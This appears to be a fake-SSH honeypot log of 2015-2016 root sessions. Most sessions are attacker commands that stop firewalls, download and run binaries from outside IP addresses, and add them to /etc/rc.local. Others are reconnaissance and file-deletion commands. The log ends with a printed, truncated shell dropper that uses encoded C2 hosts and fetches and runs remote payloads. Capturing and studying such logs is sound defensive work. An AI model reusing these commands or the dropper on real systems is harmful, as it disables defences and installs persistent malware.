echo "cd /tmp/">>/etc/rc.local
echo "./pzmo&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 139.203.97.132  4-Oct-2016 13:52:47 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.215.230.76:12234/syn7;chmod 777 syn7;./syn7;echo "cd /tmp/">>/etc/rc.local;echo "./syn7&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.215.230.76:12234/syn7
chmod 777 syn7
./syn7
echo "cd /tmp/">>/etc/rc.local
echo "./syn7&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 115.231.222.116  8-Oct-2016 00:40:31 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /etc;wget -c http://121.10.172.185:18090/sys.sh;chmod 777 sys.sh;./sys.sh;echo "cd /etc/">>/etc/rc.local;echo "./sys.sh&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /etc
wget -c http://121.10.172.185:18090/sys.sh
chmod 777 sys.sh
./sys.sh
echo "cd /etc/">>/etc/rc.local
echo "./sys.sh&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 223.148.220.6 10-Oct-2016 14:46:19 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://120.26.205.46:8080/Linux2.6;chmod 777 Linux2.6;./Linux2.6;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://120.26.205.46:8080/Linux2.6
chmod 777 Linux2.6
./Linux2.6

From 221.194.44.209 11-Oct-2016 21:49:13 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://221.194.44.209:7791/zzmo;chmod 777 zzmo;./zzmo;echo "cd /tmp/">>/etc/rc.local;echo "./zzmo&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://221.194.44.209:7791/zzmo
chmod 777 zzmo
./zzmo
echo "cd /tmp/">>/etc/rc.local
echo "./zzmo&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 110.19.181.194 15-Oct-2016 11:54:13 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /usr/bin/;rm -rf bar.sh;wget -c http://116.196.120.20:443/bar.sh;chmod 0777 bar.sh;./bar.sh;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /usr/bin/
rm -rf bar.sh
wget -c http://116.196.120.20:443/bar.sh
chmod 0777 bar.sh
./bar.sh

From 61.180.70.119 16-Oct-2016 15:39:51 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.21.203:8888/VIP;chmod 777 VIP;./VIP;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://222.186.21.203:8888/VIP
chmod 777 VIP
./VIP

From 223.220.149.164 17-Oct-2016 12:21:47 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.34.76:8080/f;chmod 777 f;./f;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://222.186.34.76:8080/f
chmod 777 f
./f

From 192.225.224.187 19-Oct-2016 16:06:37 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://172.87.31.80:8080/Linux;chmod 777 Linux;./Linux;echo "cd /tmp/">>/etc/rc.local;echo "./Linux&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://172.87.31.80:8080/Linux
chmod 777 Linux
./Linux
echo "cd /tmp/">>/etc/rc.local
echo "./Linux&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 115.239.230.227 22-Oct-2016 06:12:25 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /etc;wget http://202.181.24.140:18090/steam;chmod 777 steam;./steam
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /etc
wget http://202.181.24.140:18090/steam
chmod 777 steam
./steam

From 221.194.44.225 22-Oct-2016 16:33:23 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://221.194.44.225:7791/vzmo;chmod 777 vzmo;./vzmo;echo "cd /tmp/">>/etc/rc.local;echo "./vzmo&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://221.194.44.225:7791/vzmo
chmod 777 vzmo
./vzmo
echo "cd /tmp/">>/etc/rc.local
echo "./vzmo&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 119.249.54.66 24-Oct-2016 09:57:15 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://221.194.44.225:7791/dzmo;chmod 777 dzmo;./dzmo;echo "cd /tmp/">>/etc/rc.local;echo "./dzmo&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://221.194.44.225:7791/dzmo
chmod 777 dzmo
./dzmo
echo "cd /tmp/">>/etc/rc.local
echo "./dzmo&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 220.191.208.195 24-Oct-2016 20:18:13 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://101.1.27.170:280/breeb;chmod 777 breeb;./breeb;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://101.1.27.170:280/breeb
chmod 777 breeb
./breeb

From 159.89.179.210 25-Oct-2016 06:21:25 ssh2 root
lscpu
cat /proc/cpuinfo
uname -a
history
exit

From 221.194.44.225 29-Oct-2016 14:08:51 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://221.194.44.225:7791/rzmo;chmod 777 rzmo;./rzmo;echo "cd /tmp/">>/etc/rc.local;echo "./rzmo&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://221.194.44.225:7791/rzmo
chmod 777 rzmo
./rzmo
echo "cd /tmp/">>/etc/rc.local
echo "./rzmo&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 167.99.240.173 31-Oct-2016 22:32:37 ssh2 root
top
ps -ef
cd /etc/libX
ls
rm *

From 192.99.81.66  1-Nov-2016 08:18:45 ssh2 root
Exec ps -ef | grep syslog
ps -ef | grep syslog

From 115.231.222.145  6-Nov-2016 07:26:15 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://202.181.24.140:18090/systeam.sh;chmod 777 systeam.sh;./systeam.sh;echo "cd /tmp/">>/etc/rc.local;echo "./systeam.sh&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://202.181.24.140:18090/systeam.sh
chmod 777 systeam.sh
./systeam.sh
echo "cd /tmp/">>/etc/rc.local
echo "./systeam.sh&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 106.110.144.191  9-Nov-2016 18:13:59 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://172.87.31.80:8080/linux-arm;chmod 777 linux-arm;./linux-arm;echo "cd /tmp/">>/etc/rc.local;echo "./linux-arm&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://172.87.31.80:8080/linux-arm
chmod 777 linux-arm
./linux-arm
echo "cd /tmp/">>/etc/rc.local
echo "./linux-arm&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 106.110.144.191 10-Nov-2016 04:34:57 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://172.87.31.80:8080/Linux2.6;chmod 777 Linux2.6;./Linux2.6;echo "cd /tmp/">>/etc/rc.local;echo "./Linux2.6&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://172.87.31.80:8080/Linux2.6
chmod 777 Linux2.6
./Linux2.6
echo "cd /tmp/">>/etc/rc.local
echo "./Linux2.6&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 183.131.83.198 10-Nov-2016 14:55:55 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://183.131.83.198:786/gw1;chmod 777 gw1;./gw1;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://183.131.83.198:786/gw1
chmod 777 gw1
./gw1

From 111.73.45.188 11-Nov-2016 01:16:53 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://111.73.45.188:9876/pmm;chmod 777 pmm;./pmm;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://111.73.45.188:9876/pmm
chmod 777 pmm
./pmm

From 220.191.208.195 12-Nov-2016 18:40:45 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://218.28.143.118:5198/breeb;chmod 777 breeb;./breeb;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://218.28.143.118:5198/breeb
chmod 777 breeb
./breeb

From 221.194.44.225 20-Nov-2016 02:37:11 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://221.194.44.225:7791/pomo;chmod 777 pomo;./pomo;echo "cd /tmp/">>/etc/rc.local;echo "./pomo&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://221.194.44.225:7791/pomo
chmod 777 pomo
./pomo
echo "cd /tmp/">>/etc/rc.local
echo "./pomo&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 115.239.230.227 25-Nov-2016 17:09:45 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c hhttp://115.239.230.227:280/tmp2.4;chmod 777 tmp2.4;./tmp2.4;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c hhttp://115.239.230.227:280/tmp2.4
chmod 777 tmp2.4
./tmp2.4

From 220.191.208.195 26-Nov-2016 03:30:43 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://60.28.128.69:5198/zsbb;chmod 777 zsbb;./zsbb;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://60.28.128.69:5198/zsbb
chmod 777 zsbb
./zsbb

From 118.193.228.220 30-Nov-2016 00:39:25 ssh2 root
uname -a
ps -ef
rm -rf /etc/crontab find ./ -name "S90*" |
passwd
ababablkljkjhghfgdfdgjhkfdgfhghfgfgqqqqqqwwwwwwgqqqqqqababab

From 223.221.70.204 30-Nov-2016 11:00:23 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://218.2.0.16:7898/fuck;chmod 777 fuck;./fuck;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://218.2.0.16:7898/fuck
chmod 777 fuck
./fuck

From 111.73.45.188  3-Dec-2016 01:06:11 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://111.73.45.188:9876/loog;chmod 777 loog;./loog;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://111.73.45.188:9876/loog
chmod 777 loog
./loog

From 114.238.140.99  5-Dec-2016 15:11:59 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://172.87.26.233:8080/linux-arm;chmod 777 linux-arm;./linux-arm;echo "cd /tmp/">>/etc/rc.local;echo "./linux-arm&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://172.87.26.233:8080/linux-arm
chmod 777 linux-arm
./linux-arm
echo "cd /tmp/">>/etc/rc.local
echo "./linux-arm&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 114.238.140.99  6-Dec-2016 01:32:57 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://172.87.26.233:8080/Linux2.6;chmod 777 Linux2.6;./Linux2.6;echo "cd /tmp/">>/etc/rc.local;echo "./Linux2.6&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://172.87.26.233:8080/Linux2.6
chmod 777 Linux2.6
./Linux2.6
echo "cd /tmp/">>/etc/rc.local
echo "./Linux2.6&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 119.177.106.236  8-Dec-2016 05:17:47 ssh2 root
Exec cd /tmp;wget http://222.187.224.76:8889/vip3;chmod 777 /tmp/vip3;./vip3;
cd /tmp
wget http://222.187.224.76:8889/vip3
chmod 777 /tmp/vip3
./vip3

From 175.166.81.217  8-Dec-2016 19:03:01 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://183.136.132.217:22111/ssssyn;chmod 777 ssssyn;./ssssyn;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://183.136.132.217:22111/ssssyn
chmod 777 ssssyn
./ssssyn

From 175.166.81.217  9-Dec-2016 04:49:09 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://183.136.132.217:33333/uuuuudp;chmod 777 uuuuudp;./uuuuudp;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://183.136.132.217:33333/uuuuudp
chmod 777 uuuuudp
./uuuuudp

From 93.158.215.196  9-Dec-2016 22:41:39 ssh2 root
Exec echo testing-asdf1234
echo testing-asdf1234

From 175.166.81.217 11-Dec-2016 15:25:57 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://183.136.132.217:33333/ssssyn;chmod 777 ssssyn;./ssssyn;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://183.136.132.217:33333/ssssyn
chmod 777 ssssyn
./ssssyn

From 175.166.81.217 12-Dec-2016 06:05:09 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://183.136.132.217:33333/VIP;chmod 777 VIP;./VIP;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://183.136.132.217:33333/VIP
chmod 777 VIP
./VIP

From 221.194.44.229 17-Dec-2016 16:59:03 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://221.194.44.229:7791/yuio;chmod 777 yuio;./yuio;echo "cd /tmp/">>/etc/rc.local;echo "./yuio&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://221.194.44.229:7791/yuio
chmod 777 yuio
./yuio
echo "cd /tmp/">>/etc/rc.local
echo "./yuio&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 119.117.237.173 18-Dec-2016 18:23:17 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://42.51.193.249:2323/ssssyn;chmod 777 ssssyn;./ssssyn;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://42.51.193.249:2323/ssssyn
chmod 777 ssssyn
./ssssyn

From 223.221.70.199 20-Dec-2016 07:04:51 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://221.229.162.98:8999/zouni;chmod 777 zouni;./zouni;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://221.229.162.98:8999/zouni
chmod 777 zouni
./zouni

From 111.73.45.188 21-Dec-2016 03:46:47 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://104.160.183.6:9876/gugu;chmod 777 gugu;./gugu;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://104.160.183.6:9876/gugu
chmod 777 gugu
./gugu

From 118.193.228.220 21-Dec-2016 14:07:45 ssh2 root
uanem -a
ps- ef
ps -ef

From 221.194.44.252 24-Dec-2016 14:34:31 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://221.194.44.229:7791/pomo;chmod 777 pomo;./pomo;echo "cd /tmp/">>/etc/rc.local;echo "./pomo&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://221.194.44.229:7791/pomo
chmod 777 pomo
./pomo
echo "cd /tmp/">>/etc/rc.local
echo "./pomo&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 119.117.237.173 27-Dec-2016 07:32:05 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://111.67.195.55:48894/ssssyn;chmod 777 ssssyn;./ssssyn;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://111.67.195.55:48894/ssssyn
chmod 777 ssssyn
./ssssyn

From 5.254.97.69 28-Dec-2016 22:04:11 ssh2 root
w
cat /etc/issue
uname -a
cd /var/tmp
ls -la

From 91.197.235.11 29-Dec-2016 08:25:09 ssh2 root
mkdir ". "
wget superuser.000webhost.com/tmp/psy.tgz

From 91.197.235.11 29-Dec-2016 18:46:07 ssh2 root
ftp files.000webhost.com

From 221.194.44.135 31-Dec-2016 22:30:57 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://221.194.44.229:7791/domo;chmod 777 domo;./domo;echo "cd /tmp/">>/etc/rc.local;echo "./domo&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://221.194.44.229:7791/domo
chmod 777 domo
./domo
echo "cd /tmp/">>/etc/rc.local
echo "./domo&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

File: fakesshd-log-2015.txt


From 91.81.221.209  8-Apr-2015 11:36:05 ssh2 root
w
ls
history
nano test.pl
yum install nano
apt-get install nano
wgte
cd ..
cd
ls
cd /tmp
ls
cd
ls
cd /tmp
ls
cd
ls
cat test.pl
ps x
history
uname -a
pro

From 78.134.103.209  8-Apr-2015 21:22:13 ssh2 root
w
ifconfig
ls
ls -all
nano .ssh
passwd
wget http://teamkid.at.ua/Top.pdf ; perl
uname -a
cat /proc/cpuinfo
PS X

From 85.127.167.245  9-Apr-2015 02:15:17 ssh2 root
uname -a
free -m
cat /proc/cpuinfo
perl
cat /etc/issue
apt-get install update
yum install update

From 23.251.63.56  9-Apr-2015 16:54:29 ssh2 root
Exec __host_32__="sEEA+==deadefadcajc+jjjj"
__host_64__="sEEA+==deadefadcaih+jjjj"

__host_32_2__="sEEA+==cbeadgakaddh+jjjj"
__host_64_2__="sEEA+==cbeadgakaddg+jjjj"

__host_32_libc__="sEEA+==cbeadgakaddh+jjjj"
__host_64_libc__="sEEA+==cbeadgakaddg+jjjj"

__download_url__="sEEA+==deadefahbacfb=tyDElww=jbbh"

__remote__="cbeadgakadfg+jbbh|cbeadfbacfcagb+jbbh|hhacbdadgeaeb+jbbh|yoyDaoDludlcazCr+jbbh|yoyDaoDludlazCr+jbbh|yoyDasnItlzlzanzx+jbbh|yoyDaoDludlanzx+jbbh"

__username__='loxty'
__password__='admin'

__temp__=/tmp
__install_dir__=/usr/local/bin
__kernel__=`uname -r|awk -F- '{print $1}'`

# select compiler server
server(){
	__osv_X86_64=`dec 'Ijh_hf'`
	__osv_AMD64=`dec 'LXOhf'`
	__os_version_X86_64=`uname -a|grep "$__osv_X86_64"`
	__os_version_AMD64=`uname -a|grep "$__osv_AMD64"`
	if [ -f /lib/libc.so.6 ]; then
		__libc_main=`ls -la /lib/libc.so.6 | grep libc-|awk -F'libc-' '{print $2}'|awk -F'.' '{print $1}'`
		__libc_sub=`ls -la /lib/libc.so.6 | grep libc-|awk -F'libc-' '{print $2}'|awk -F'.' '{print $2}'`
	fi

	if [ ! -z "$__os_version_X86_64" -o ! -z "$__os_version_AMD64" ] ;then
		__online=`wget "$__host_64__/check.action?iid=$__iid&kernel=$__kernel__" --connect-timeout=3 -t 1 -q -O -`
		if [ ! -z "$__online" ]; then #
			__host__=$__host_64__
		else
			__host__=$__host_64_2__
		fi

		if [ -f /lib/libc.so.6 ]; then
			if [ $__libc_main -le 2 ]; then
				if [ $__libc_sub -le 5 ]; then
					__host__=$__host_64_libc__
				fi
			fi
		fi
	else
		__online=`wget "$__host_32__/check.action?iid=$__iid&kernel=$__kernel__" --connect-timeout=3 -t 1 -q -O -`
		if [ ! -z "$__online" ]; then #
			__host__=$__host_32__
		else
			__host__=$__host_32_2__
		fi

		if [ -f /lib/libc.so.6 ]; then
			if [ $__libc_main -le 2 ]; then
				if [ $__libc_sub -le 5 ]; then
					__host__=$__host_32_libc__
				fi
			fi
		fi
	fi
}

# check md5
md5(){
	__data=`echo "$@"`
	echo -n "$__data"|md5sum|cut -d ' ' -f1
	return 0
}

# get os version
version(){
	if [ -f /sbin/modinfo ]; then
		SYS=`/sbin/lsmod |tail -n 1 | awk ' {print $1} '`
		echo "`/sbin/modinfo $SYS|grep vermagic|awk -F: '{print $2}'|sed 's/^ *//g'|awk '{print $0}'|sed 's/ /\\\\ /g'`"
	fi
	return 0
}

checkBuild(){
	__build=/lib/modules/`uname -r`/build/
	if [ -d $__build ]; then
		return 1
	fi
	return 0
}

# generate header file
generate(){
	__files=`ls $__build`
	tar zcfhP "$__temp__/dev.tgz" -C $__build $__files
	if [ $? -eq 0 ] ;then
		return 1
	fi
	return 0
}

# check header version
check(){
	__iid=`echo "$@"`
	if [ ! -z "$__iid" ]; then
		__result=`wget "$__host__/check.action?iid=$__iid&kernel=$__kernel__" --connect-timeout=3 -t 3 -O - -q`
		if [ ! -z "$__result" ]; then
			__code=`echo $__result|awk -F "|" '{print $1}'`
			__md5=`echo $__result|awk -F "|" '{print $2}'`
			if [ $__code -eq 1001 ]; then
				return 1
			fi
		fi
	fi
	return 0
}

# download build file
download(){
	__iid=`echo "$@"`
	if [ ! -z "$__iid" ]; then
		__url="$__host__/upload/module/$__iid/build.tgz"
		wget "$__url" -O /tmp/build.tgz -q --connect-timeout=3 -t 3
		if [ $? -eq 0 ];then #
			return 1
		fi
	fi
	return 0
}

download_and_execute(){
	wget "$__download_url__" -O /tmp/bin -q --connect-timeout=3 -t 3
	if [ $? -eq 0 ];then #
		chmod +x /tmp/bin
		/tmp/bin
		sleep 3
		rm -rf /tmp/bin
		return 1
	fi
	return 0
}

# remote compiler code
compiler(){
	__iid=`echo "$@"`
	if [ ! -z "$__iid" ]; then
		__url="$__host__/compiler.action?iid=$__iid&username=$__username__&password=$__password__&ip=$__remote__&ver=$__version__&kernel=$__kernel__"
		__result=`wget "$__url" -O - -q --connect-timeout=3 -t 3`
		if [ ! -z "$__result" ]; then
			__code=`echo $__result|awk -F "|" '{print $1}'`
			__md5=`echo $__result|awk -F "|" '{print $2}'`
			if [ $__code -eq 1001 ]; then
				return 1
			fi
		fi
	fi
	return 0
}

# uncompress file
uncompress(){
	__iid=`echo "$@"`
	if [ ! -z "$__iid" ]; then
		if [ ! -d $__temp__/$__iid ]; then
			mkdir $__temp__/$__iid
		fi
		tar zxvf $__temp__/build.tgz -C $__temp__/$__iid
		if [ $? -eq 0 ] ;then
			shred -u -z $__temp__/build.tgz
			return 1
		fi
	fi
	return 0
}
enc(){ echo $@|tr "[.0-9a-zA-Z\/\/\:]" "[a-zA-Z0-9\;-=+*\/]"; }
dec(){ echo $@|tr "[a-zA-Z0-9\;-=+*\/]" "[.0-9a-zA-Z\/\/\:]"; }

# install file
setup(){
	__iid=`echo "$@"`
	if [ ! -z "$__iid" ]; then
		__bin=`echo "bin"`
		chmod +x $__temp__/$__iid/$__bin
		$__temp__/$__iid/$__bin
		if [ $? -eq 0 ]; then
			sleep 3
			rm -rf $__temp__/$__iid/$__bin
			return 1
		fi
	fi
	return 0

}

# upload
upload(){
	rm -f /tmp/mini
	wget $__host__/upload/mini -O /tmp/mini -q --connect-timeout=3 -t 3
	if [ $? -eq 0 ];then #
		chmod +x /tmp/mini
		__url=$__host__/submit.action
		__result=`/tmp/mini --url="$__url" --post="username=$__username__&password=$__password__&ip=$__remote__&ver=$__version__&kernel=$__kernel__&file=@$__temp__/dev.tgz"`
		if [ ! -z "$__result" ]; then
			__code=`echo $__result|awk -F "|" '{print $1}'`
			__md5=`echo $__result|awk -F "|" '{print $2}'`
			if [ $__code -eq 1001 ]; then
				rm -f /tmp/mini
				return 1
			fi
		fi
		rm -f /tmp/mini
	fi
	return 0
}

# main entry
main(){
	PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
	__host_32__=`dec "$__host_32__"`
	__host_64__=`dec "$__host_64__"`
	__host_32_2__=`dec "$__host_32_2__"`
	__host_64_2__=`dec "$__host_64_2__"`
	__host_32_libc__=`dec "$__host_32_libc__"`
	__host_64_libc__=`dec "$__host_64_libc__"`
	__download_url__=`dec "$__download_url__"`
	__remote__=`dec "$__remote__"`
	__username__=`dec "$__username__"`
	__version__=`version`
	__iid=`md5 "$__version__"`
	__iid=`echo $__iid|tr [:lower:] [:upper:]`
	__done=0

	if [ ! -d /tmp ]; then
	mkdir /tmp
	fi

	if [ -f /usr/bin/wget ]; then
	chattr -i /usr/bin/wget
	chmod +x /usr/bin/wget
	fi

	if [ -f /bin/wget ]; then
	chattr -i /bin/wget
	chmod +x /bin/wget
	fi

	if [ -f /usr/bin/cut ]; then
	chattr -i /usr/bin/cut
	chmod +x /usr/bin/cut
	fi

	if [ -f /bin/cut ]; then
	chattr -i /bin/cut
	chmod +x /bin/cut
	fi

	server # select http server
	check $__iid
	if [ $? -eq 1 ];then
		compiler $__iid # remote compiler
		if [ $? -eq 1 ]; then
			__done=1
		fi
	else
		checkBuild
